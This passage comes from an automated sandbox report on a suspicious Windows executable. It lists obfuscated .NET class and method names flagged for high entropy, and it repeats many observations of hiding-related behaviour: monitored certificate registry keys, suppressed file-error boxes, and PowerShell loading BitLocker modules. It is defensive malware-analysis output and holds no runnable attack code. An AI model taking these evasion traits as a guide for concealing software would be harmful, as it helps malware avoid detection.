                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Xhifmp5Im2uIeQ4LD5.cs High entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, ruDEOU2khIBVLAC5eC.cs High entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, cbbtMY7GD7d1iUYhAX.cs High entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, UIgDiRLwSiBdvbIDpp.cs High entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, qelLwRPCPsGUs6jdyY.cs High entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, ggXPZ5pdN41pIJs1V3.cs High entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, KiBPZRUmpULxGIDG71.cs High entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, vbF4dwbDYXd1pm0UND.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ad8t06TsdlZPlGJflu.cs High entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, nJfbfko7qhviuIACOm.cs High entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.cs High entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs High entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, UQ2KwGjrcRdMFjeybgG.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, NvlJnjtLs8bdgXBD99.cs High entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, vFBqrTW7LF9gFQ3SS9.cs High entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, w4aIYZZAxAL81mU4Pf.cs High entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, I7L8C6N1ebf5t9UBNB.cs High entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, qFpaCg4OeA9gyeZYvB.cs High entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, XEbj01c6HjltfqTAYO.cs High entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, a6ErcFYOWqRCf0yytN.cs High entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, VTwGxuj9BXOw3aUhmTr.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Xps7qRzTcm6j2O5EgP.cs High entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, GmQF5c96kjSSXmTedq.cs High entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, nrtLcTjjDPGqy3J5J8r.cs High entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, VushkvqOit4FjNAy9I.cs High entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Xhifmp5Im2uIeQ4LD5.cs High entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, ruDEOU2khIBVLAC5eC.cs High entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, cbbtMY7GD7d1iUYhAX.cs High entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, UIgDiRLwSiBdvbIDpp.cs High entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
